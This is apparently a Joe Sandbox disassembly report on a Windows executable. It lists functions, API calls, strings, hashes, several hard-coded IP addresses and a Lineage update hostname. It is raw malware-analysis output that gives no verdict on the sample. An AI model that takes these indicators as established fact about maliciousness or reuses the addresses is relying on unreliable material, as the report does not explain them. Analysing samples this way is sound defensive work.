                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _closefprintf$printf$_fileno_lseek_open_read_unlinkctimeperror
                                                                              • String ID: -- replaced with %s$ OK$%s:%s$%s: $%s: %s compressed to %s$%s: %s has %d other link%c -- unchanged$%s: %s is a directory -- ignored$%s: %s is not a directory or a regular file - ignored$stdout
                                                                              • API String ID: 1541217084-3248522284
                                                                              • Opcode ID: b5958a7073e537e6be3eee5a2b732590f34853b571a0c1dc919246365374f012
                                                                              • Instruction ID: 2a23522d500c7a5ea6000970241284742af6b4d2fa8c168bbd1fe75f910773dc
                                                                              • Opcode Fuzzy Hash: b5958a7073e537e6be3eee5a2b732590f34853b571a0c1dc919246365374f012
                                                                              • Instruction Fuzzy Hash: 09D113B1B00201ABD720AF64FC816763BA8E741317714853FE902E63E1D77EAA95CB1D
                                                                              Function 00403500 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 231COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 917 403500-403518 918 4035a1-4035af 917->918 919 40351e-403524 917->919 921 4035b1-4035b7 918->921 922 4035b9-4035cd _fileno _setmode 918->922 919->918 920 403526-403532 919->920 923 403534 920->923 924 403537-403546 _fileno _isatty 920->924 921->922 925 4035d0-4035d6 921->925 922->925 923->924 924->918 926 403548-40354e 924->926 927 4035d8-4035de 925->927 928 403609-403655 925->928 932 403550-40355a 926->932 933 40355c-403561 926->933 927->928 929 4035e0-4035e6 927->929 930 403657-40365d 928->930 931 40365f-40367b _fileno _fstat 928->931 934 4035f0-403606 _fileno _setmode 929->934 935 4035e8-4035ee 929->935 930->931 936 403696-4036bc call 40ecf0 930->936 937 40368a-403690 931->937 938 40367d-403687 call 40f070 931->938 939 403566-40359e fprintf * 2 call 4055b0 932->939 933->939 934->928 935->928 935->934 946 4036e4-4036ea 936->946 947 4036be-4036d4 call 404400 936->947 937->936 938->937 939->918 948 403706-40372d _fileno * 2 946->948 949 4036ec-403705 call 404bb0 946->949 947->946 953 4036d6-4036e1 call 4055b0 947->953 957 403733-40373a 948->957 958 403807-40380a 948->958 953->946 960 4037a3-4037a9 957->960 961 40373c-403742 957->961 960->958 962 4037ab-4037b1 960->962 961->960 963 403744-403752 961->963 964 4037b3-4037c9 fprintf 962->964 965 4037ca-4037cc 962->965 963->960 966 403754-403769 call 404400 963->966 965->958 967 4037ce-403804 call 40f130 fprintf 965->967 966->958 971 40376f-40379d _fileno * 2 966->971 967->958 971->957 974 40379f-4037a2 971->974
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _fileno$fprintf$_setmode$_fstat_isattyfputc
                                                                              • String ID: OK$%s: compressed data not %s a terminal. Use -f to force %scompression.$For help, type: %s -h$fstat(stdin)$read from$stdin$stdout$written to
                                                                              • API String ID: 1326738777-4290703084
                                                                              • Opcode ID: aeb3b81861f52e403574609cd3c244e0d3c74c38de85d180685d4af0a9158233
                                                                              • Instruction ID: 86b30110bb0a3b6f2c6db9276085434286e42ed4231fcf90175aa3a5b4ebeb31
                                                                              • Opcode Fuzzy Hash: aeb3b81861f52e403574609cd3c244e0d3c74c38de85d180685d4af0a9158233
                                                                              • Instruction Fuzzy Hash: 6571D5F5B00240ABDB20DF65FC859663769E744306304853EE901D73A0EB7EEA95CB6D
                                                                              Function 00405100 Relevance: 42.2, APIs: 18, Strings: 6, Instructions: 216COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 975 405100-40512a _errno _stat 976 405154-40515b 975->976 977 40512c-405131 _errno 975->977 980 405194-4051a8 call 404f00 976->980 981 40515d-405171 call 404e70 976->981 978 4053c3-4053ca 977->978 979 405137-405152 call 404f70 _stat 977->979 979->976 979->977 988 405258-405265 980->988 989 4051ae-4051b4 980->989 981->980 990 405173-40518e call 404f70 _stat 981->990 993 405367-405387 _chmod _unlink 988->993 994 40526b-40529d fprintf 988->994 991 4051b9-4051c1 989->991 990->978 990->980 995 4051e1-4051e3 991->995 996 4051c3-4051c5 991->996 993->978 997 405389-4053c2 fprintf perror 993->997 999 4052f1-4052f9 994->999 1000 40529f-4052b8 _fileno _isatty 994->1000 1006 4051e6-4051e9 995->1006 1004 4051c7-4051d1 996->1004 1005 4051dd-4051df 996->1005 1002 405312-405323 999->1002 1003 4052fb-405310 _isctype 999->1003 1000->999 1001 4052ba-4052ee fprintf fflush fgets 1000->1001 1001->999 1007 405326-40532b 1002->1007 1003->1007 1004->995 1008 4051d3-4051db 1004->1008 1005->1006 1009 40521b-405239 1006->1009 1010 4051eb-4051f7 1006->1010 1011 405330-405333 1007->1011 1012 40532d 1007->1012 1008->991 1008->1005 1015 40523a-405257 fprintf 1009->1015 1013 4051f9 1010->1013 1014 4051fe-405219 1010->1014 1011->993 1016 405335-405350 fprintf 1011->1016 1012->1011 1013->1014 1014->1015 1017 405352 1016->1017 1018 40535c-405366 1016->1018 1017->1018
                                                                              APIs
                                                                              Strings
                                                                              • %s: , xrefs: 00405398
                                                                              • %s: %s already exists;, xrefs: 00405286
                                                                              • %s: %s and %s are the same file, xrefs: 00405234
                                                                              • do you wish to overwrite (y or n)? , xrefs: 004052C0
                                                                              • not overwritten, xrefs: 0040533B
                                                                              • %s: %s: cannot %scompress onto itself, xrefs: 00405213
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf$_stat$_errno$_chmod_fileno_isatty_isctype_unlinkfflushfgetsperror
                                                                              • String ID: not overwritten$ do you wish to overwrite (y or n)? $%s: $%s: %s already exists;$%s: %s and %s are the same file$%s: %s: cannot %scompress onto itself
                                                                              • API String ID: 1232929357-1725047516
                                                                              • Opcode ID: 1ed07c99c068b10299e3d847c13043037691ae0a13ca23aa9e734b22a1568e68
                                                                              • Instruction ID: 6a7e35fd7f8b385ddd55cce18be339e63df7b5a6f0a9431496ccac823175c9ad
                                                                              • Opcode Fuzzy Hash: 1ed07c99c068b10299e3d847c13043037691ae0a13ca23aa9e734b22a1568e68
                                                                              • Instruction Fuzzy Hash: 8C61F470B003007BD3109B64EC92BA737A4EF45705B548436FC44EB390E6BEE9958B6D
                                                                              Function 00402DF0 Relevance: 31.9, APIs: 8, Strings: 10, Instructions: 370stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: strrchr$strncmp$_fileno_setmodeatoifprintfstrncpy
                                                                              • String ID: %s: -Z not supported in this version$%s: -r not supported on this system$%s: incorrect suffix '%s'$.exe$.gz$GZIP$ab:cdfhH?lLmMnNqrS:tvVZ123456789$cat$gun$gzcat
                                                                              • API String ID: 1511210060-2410909284
                                                                              • Opcode ID: 3bc455e48d4a5361739b9e2423ef43b4b4f49de21d4885c07e4e53c99fb8b497
                                                                              • Instruction ID: d6edb331924bb78c21df49292a51c26180e3f742f3dc669454e9bcf32040e1cd
                                                                              • Opcode Fuzzy Hash: 3bc455e48d4a5361739b9e2423ef43b4b4f49de21d4885c07e4e53c99fb8b497
                                                                              • Instruction Fuzzy Hash: DCD127707002019BD314DF24EC457763BA6AB49306F14863FE816AB3E1EBBEDA46874D
                                                                              Function 00407AC0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 220filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • qsort.MSVCRT ref: 00407AE1
                                                                              • CreateFileA.KERNEL32(0042374C,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00407B01
                                                                              • MessageBoxA.USER32(00000000,Can't create pack file.,0041BA48,00000000), ref: 00407B1C
                                                                              • _ftol.MSVCRT ref: 00407B5D
                                                                              • SendMessageA.USER32(00000000,00000402,00000000,00000000), ref: 00407B6E
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 00407B7B
                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00407C41
                                                                              Strings
                                                                              • Error writing pack file., xrefs: 00407CD7
                                                                              • Seek error on pack file., xrefs: 00407CA1
                                                                              • Can't create pack file., xrefs: 00407B15
                                                                              • Error opening source file., xrefs: 00407CC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$Message$CreatePointerSendWrite_ftolqsort
                                                                              • String ID: Can't create pack file.$Error opening source file.$Error writing pack file.$Seek error on pack file.
                                                                              • API String ID: 1500916305-1024041696
                                                                              • Opcode ID: dbb7e63f852ab9dd99e192b39ced9e4e053ee1132dbf60b5abd96272cbcf3cac
                                                                              • Instruction ID: b5ffe4538ae922592fb07cc0909b73d645e7ae2434572a5370746c21ad9d63f8
                                                                              • Opcode Fuzzy Hash: dbb7e63f852ab9dd99e192b39ced9e4e053ee1132dbf60b5abd96272cbcf3cac
                                                                              • Instruction Fuzzy Hash: 55611A31B483006BE3209B24AC46FDB7794EB84715F14453AFA05A72C1DBBDB94487AE
                                                                              Function 00404BB0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 196COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: printf$_lseek_readctime
                                                                              • String ID: %9lu %9lu $ %s$ (totals)$%5s %08lx %11s $%9ld %9ld $compressed uncompr. ratio uncompressed_name$method crc date time
                                                                              • API String ID: 1556447124-282228352
                                                                              • Opcode ID: de2b219f98632ea8b75618b42fd825b92a5bffff2d43f3c8c7a1cf5409859650
                                                                              • Instruction ID: caed29f957b9a2a5ae34b4503dae89f7bd37bbdccc10164b9880fa2a1488fc45
                                                                              • Opcode Fuzzy Hash: de2b219f98632ea8b75618b42fd825b92a5bffff2d43f3c8c7a1cf5409859650
                                                                              • Instruction Fuzzy Hash: E061DFB1B002019FE324CF68EC81A7A77A5EBC4305B44823EE915D73E0E779A915CB6D
                                                                              Function 00403D40 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _close$_unlinkperror$_fstat_openfprintf
                                                                              • String ID: %s: $%s: %s: warning, name truncated
                                                                              • API String ID: 1389079204-458201650
                                                                              • Opcode ID: a3126ab65de63e92ad8fa693e295b5a28395d762c483af1bd3e1123f9cb77154
                                                                              • Instruction ID: 5acda6029e939a4717fff11dc4368bb8f9bcee2258bef70ed8b10927a55ce341
                                                                              • Opcode Fuzzy Hash: a3126ab65de63e92ad8fa693e295b5a28395d762c483af1bd3e1123f9cb77154
                                                                              • Instruction Fuzzy Hash: F5414A71B003006BD310EF65FC86AA77768EB41712B44453AFD00C6390EBBEE9498BAD
                                                                              Function 00403470 Relevance: 26.3, APIs: 6, Strings: 9, Instructions: 41COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf
                                                                              • String ID: %s %s (%s)$1.2.4$18 Aug 93$Compilation options:%s %s $NO_CHOWN $NO_DIR$PROTO $STDC_HEADERS $SYS_UTIME
                                                                              • API String ID: 383729395-2689630165
                                                                              • Opcode ID: a70cb19a629df5b07583c66aabe98044dffa5f6107cef01d8c84a7f8fd9d9bae
                                                                              • Instruction ID: 4b6a6e37a4e8a8b24d19e98f8069f77a165053a3780c44f2d19bed00bfec8d7f
                                                                              • Opcode Fuzzy Hash: a70cb19a629df5b07583c66aabe98044dffa5f6107cef01d8c84a7f8fd9d9bae
                                                                              • Instruction Fuzzy Hash: A3F0F2B2A90360B7E21497A4AE46FC62B59974DB403258617A602E6390D5FDE8D08B9C
                                                                              Function 0040C320 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 114libraryloaderstringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 0040C353
                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C36F
                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040C379
                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040C383
                                                                              • lstrlen.KERNEL32(?), ref: 0040C3E2
                                                                              • lstrcpy.KERNEL32(?,?), ref: 0040C401
                                                                              • CloseHandle.KERNEL32(?), ref: 0040C441
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C457
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleProc$Close$Modulelstrcpylstrlen
                                                                              • String ID: CreateToolhelp32Snapshot$KERNEL32.DLL$Process32First$Process32Next
                                                                              • API String ID: 4077257286-2574356532
                                                                              • Opcode ID: e8387bdb3c3689115f51c203db012f4b9b98175315e1d7d8616b368c3c14683c
                                                                              • Instruction ID: 69232cbab9329239a9ff3fe9dd903f740cb54fcaca41571de1296c06b2b3d69c
                                                                              • Opcode Fuzzy Hash: e8387bdb3c3689115f51c203db012f4b9b98175315e1d7d8616b368c3c14683c
                                                                              • Instruction Fuzzy Hash: 0631E9312043559BC7109F64DC84BEBF7D8FF89710F404A3AE958E3280D7B9D9498B99
                                                                              Function 00408AB0 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 143windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendDlgItemMessageA.USER32(?,000003F5,000000C5,00007FFF,00000000), ref: 00408AF1
                                                                              • GetDlgItem.USER32(?,000003F6), ref: 00408AFD
                                                                              • SendMessageA.USER32(00000000,00000401,00000000,7FFF0000), ref: 00408B15
                                                                              • _beginthreadex.MSVCRT ref: 00408C4F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMessageSend$_beginthreadex
                                                                              • String ID: 202.85.231.12$210.122.63.89$210.200.182.141$211.53.239.211$43.231.249.1$63.104.49.23$hP9B
                                                                              • API String ID: 2122396886-1343465851
                                                                              • Opcode ID: 00870eb72e755f9de7d8cac1b0a71af431e78c8d88687759df4325499df4bb19
                                                                              • Instruction ID: cc25442dbb5c4d6f965149cfb9878dcd33b761491a2cb82b5a7cb29ef3ad2388
                                                                              • Opcode Fuzzy Hash: 00870eb72e755f9de7d8cac1b0a71af431e78c8d88687759df4325499df4bb19
                                                                              • Instruction Fuzzy Hash: 3141E835B0960456D7244B385D057AA3BA1D782320F59827FBA9BE73D0CFB88C07935C
                                                                              Function 004074D0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 97filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00423A54,40000000,00000000,00000000,00000002,00000080,00000000), ref: 004074EA
                                                                              • MessageBoxA.USER32(00000000,Can't create index file.,0041BA48,00000000), ref: 00407505
                                                                              • WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00407524
                                                                              • MessageBoxA.USER32(00000000,Error writing index file.,0041BA48,00000000), ref: 0040753B
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407542
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FileMessage$CloseCreateHandleWrite
                                                                              • String ID: Can't create index file.$Error writing index file.
                                                                              • API String ID: 2961909895-600444791
                                                                              • Opcode ID: f85f91edbfcc18edba49a262f6f646280cdb792821b01d4b12fb3f4e1be4ab76
                                                                              • Instruction ID: 8a0bc0facd1aecf11997ae2cae6aa2fac9b54c369b2d5b7d37cf35be00517035
                                                                              • Opcode Fuzzy Hash: f85f91edbfcc18edba49a262f6f646280cdb792821b01d4b12fb3f4e1be4ab76
                                                                              • Instruction Fuzzy Hash: 5B21D631788201BEE310CB38FC46FDB7794EB84756F20852AF209E15D0D7B8A584C79A
                                                                              Function 004053D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: fprintf$_chmodperror$_unlink
                                                                              • String ID: %s: $%s: time stamp restored
                                                                              • API String ID: 3310226241-733184430
                                                                              • Opcode ID: 24a8beef19f5cd096eb5dda689d36be08d908d389252601d4180a251c570d050
                                                                              • Instruction ID: 67df91fde78b826e4749d222bdc36cb0341bab375db6d7fecd87f0bb88f8dbba
                                                                              • Opcode Fuzzy Hash: 24a8beef19f5cd096eb5dda689d36be08d908d389252601d4180a251c570d050
                                                                              • Instruction Fuzzy Hash: 27318470740301A7E720AF55EC82BA733A8EB40755B548436E904EB390E7BDE9958F6D
                                                                              Function 004071D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 74fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,usmainupd2.lineageTheBloodPledge.com,?,75C09CE0,?,0040A69E,lineage.cfg,00000000,usmainupd2.lineageTheBloodPledge.com), ref: 004071EB
                                                                              • sprintf.MSVCRT ref: 00407203
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,0040B53D), ref: 00407216
                                                                              • sprintf.MSVCRT ref: 00407244
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040724E
                                                                              Strings
                                                                              • usmainupd2.lineageTheBloodPledge.com, xrefs: 004071D7
                                                                              • File not found for %s, xrefs: 004071F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Filesprintf$CloseCreateHandleSize
                                                                              • String ID: File not found for %s$usmainupd2.lineageTheBloodPledge.com
                                                                              • API String ID: 2219480462-2963495118
                                                                              • Opcode ID: 58fef6064f4c8a2234d0555b2f3379d0813ace5401b7a8ee403f8e7830520cab
                                                                              • Instruction ID: 5245a720053aa41af2b67493ead1f6ba6fd0905d8e977c31303b170893638657
                                                                              • Opcode Fuzzy Hash: 58fef6064f4c8a2234d0555b2f3379d0813ace5401b7a8ee403f8e7830520cab
                                                                              • Instruction Fuzzy Hash: 4511E7327443007BD1106B69BC49FD73B5CDB85B66F104036FB04A11D1D7A96544426E
                                                                              Function 0040EF00 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 156stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: freegetenvstrcspnstrspn
                                                                              • String ID: argc<=0$n.@$out of memory
                                                                              • API String ID: 3980070842-2039068372
                                                                              • Opcode ID: b377abb427cc531090c987af98b4f5916b5b97905e371a5181f3429f52bfafb0
                                                                              • Instruction ID: 0d06460566aa7cc97bb9a07f500ff12f0f6c80f3c491f2905d9dfca7791f36b4
                                                                              • Opcode Fuzzy Hash: b377abb427cc531090c987af98b4f5916b5b97905e371a5181f3429f52bfafb0
                                                                              • Instruction Fuzzy Hash: 1A41E5B16043065BD7249F28AC4066777D1EF85324F28057EFCC6A7382DBBE9C468799
                                                                              Function 00404200 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: _strlwrfprintf
                                                                              • String ID: %s: %s already has %s suffix -- unchanged$%s: %s: unknown suffix -- ignored$.tar$.taz$.tgz
                                                                              • API String ID: 482835165-2475073226
